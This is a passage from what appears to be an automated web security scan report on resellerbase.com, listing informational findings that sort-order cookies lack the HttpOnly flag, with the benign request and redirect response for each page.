POST /tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:58:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.99. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:58:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.100. http://www.resellerbase.com/tag/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:59:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.101. http://www.resellerbase.com/tag/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:59:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.102. http://www.resellerbase.com/tag/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:59:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/themes/search.php?keyword=search...&Submit3=Search&opt=2
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.103. http://www.resellerbase.com/tag/travel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/travel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/travel HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/travel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:55:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/travel
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.104. http://www.resellerbase.com/tag/uk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/uk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/uk HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/uk
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:58:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/uk
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.105. http://www.resellerbase.com/tag/vaccation

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/vaccation

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/vaccation HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/vaccation
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:55:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/vaccation
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.106. http://www.resellerbase.com/tag/video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/video

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/video HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/video
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/video
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.107. http://www.resellerbase.com/tag/web+cam

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/web+cam

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/web+cam HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/web+cam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:57:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/web+cam
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.108. http://www.resellerbase.com/tag/web+hosting

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/web+hosting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/web+hosting HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/web+hosting
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:53:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/web+hosting
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.109. http://www.resellerbase.com/tag/webcam

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/webcam

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/webcam HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/webcam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/webcam
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.110. http://www.resellerbase.com/tag/white+label

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/white+label

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/white+label HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/white+label
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:57:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/white+label
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.111. http://www.resellerbase.com/travel-vaccation/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /travel-vaccation/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:41:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /travel-vaccation/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.112. http://www.resellerbase.com/travel-vaccation/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /travel-vaccation/search.php?cat=12&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/search.php?cat=12&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:42:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /travel-vaccation/search.php?cat=12&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.113. http://www.resellerbase.com/web-service/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:42:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.114. http://www.resellerbase.com/web-service/domain-names/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/domain-names/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:45:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/domain-names/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.115. http://www.resellerbase.com/web-service/domain-names/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/domain-names/search.php?cat=1&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/search.php?cat=1&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:46:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/domain-names/search.php?cat=1&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.116. http://www.resellerbase.com/web-service/other/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/other/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:42:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/other/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.117. http://www.resellerbase.com/web-service/other/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/other/search.php?cat=18&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/search.php?cat=18&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:43:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/other/search.php?cat=18&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.118. http://www.resellerbase.com/web-service/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:49:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.119. http://www.resellerbase.com/web-service/software-scripts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/software-scripts/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:44:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/software-scripts/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.120. http://www.resellerbase.com/web-service/software-scripts/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/software-scripts/search.php?cat=14&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/search.php?cat=14&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:44:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/software-scripts/search.php?cat=14&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.121. http://www.resellerbase.com/web-service/web-hosting/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/web-hosting/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:46:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /web-service/web-hosting/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.122. http://www.resellerbase.com/web-service/web-hosting/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web-service/web-hosting/search.php?cat=2&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/search.php?cat=2&keyword=search...&Submit3=Search&opt=1
